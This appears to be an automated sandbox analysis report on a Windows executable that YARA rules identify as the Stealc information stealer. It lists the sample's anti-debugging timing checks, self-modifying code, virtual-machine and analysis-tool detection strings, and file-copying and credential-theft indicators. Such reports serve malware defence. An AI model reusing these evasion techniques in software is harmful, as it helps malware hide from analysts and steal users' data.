Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33183 second address: A33188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A332E8 second address: A332EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37D37 second address: A37D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE2Ah 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 jc 00007F7F1511CE26h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E501 second address: A3E51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA58h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3E946 second address: A3E94B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A441AE second address: A441D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7F147AEA5Dh 0x0000000b jmp 00007F7F147AEA57h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F7F147AEA46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A4A second address: A45A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A4E second address: A45A7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7F147AEA58h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A7A second address: A45A9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F7F1511CE2Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F7F1511CE26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45A9D second address: A45AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A45AAC second address: A45AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A495A8 second address: A495BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A495BE second address: A495C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A496DC second address: A496F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F7F147AEA46h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4FEEB second address: A4FEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A57992 second address: A579B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59DD2 second address: A59DE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59DE0 second address: A59DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9948E1 second address: 9948FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F3A4 second address: A6F3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7F147AEA59h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 jmp 00007F7F147AEA50h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A723DE second address: A723E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A00 second address: A73A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A0F second address: A73A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A13 second address: A73A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 jc 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A2E second address: A73A3C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A3C second address: A73A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B83C second address: A7B850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A393 second address: A7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A397 second address: A7A3CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1511CE39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3CC second address: A7A3E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7F147AEA46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3E8 second address: A7A3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3EC second address: A7A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996482 second address: 996488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F87F second address: A7F883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F883 second address: A7F8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F7F1511CE3Ah 0x0000000e jmp 00007F7F1511CE34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F8A5 second address: A7F8BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA50h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FA82 second address: A7FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 popad 0x0000000a jmp 00007F7F1511CE33h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FAAA second address: A7FAB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CC51 second address: A9CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE2Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E97A second address: A9E97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E97E second address: A9E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD717 second address: AAD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE2D second address: AADE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F1511CE26h 0x0000000a jl 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE3E second address: AADE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE48 second address: AADE52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1511CE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE10C second address: AAE112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE242 second address: AAE24C instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB109A second address: AB10B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3CF0 second address: AB3CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3CF5 second address: AB3D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7F147AEA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F4A second address: AB3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F4E second address: AB3F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F54 second address: AB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F7F1511CE2Bh 0x00000015 jnp 00007F7F1511CE29h 0x0000001b adc dh, FFFFFF8Fh 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D2971h] 0x00000025 jnc 00007F7F1511CE36h 0x0000002b push 29A5B6F5h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7F1511CE37h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3FC5 second address: AB3FCF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3FCF second address: AB3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7376 second address: AB737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB737A second address: AB738C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7F1511CE2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480239 second address: 5480248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480248 second address: 548024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548024E second address: 5480252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480252 second address: 548028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7F1511CE2Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F7F1511CE2Bh 0x00000018 popfd 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548028C second address: 54802B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F147AEA4Ah 0x0000000c xor ecx, 25DF0888h 0x00000012 jmp 00007F7F147AEA4Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54802B6 second address: 54802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 4364h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480346 second address: 548034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548034C second address: 5480351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFDC1 second address: 9CFDE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F7F147AEA46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFDE3 second address: 9CFDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8219E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9C686F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9ECA21 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005D3EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C1160 GetSystemInfo,ExitProcess,

0_2_005C1160

Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`\|P
Source: file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005C45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005D9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9750 mov eax, dword ptr fs:[00000030h]

0_2_005D9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005D7850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005D9600

Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DjF=Program Manager
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: oDjF=Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_005D7B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_005D6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005D7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_005D7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
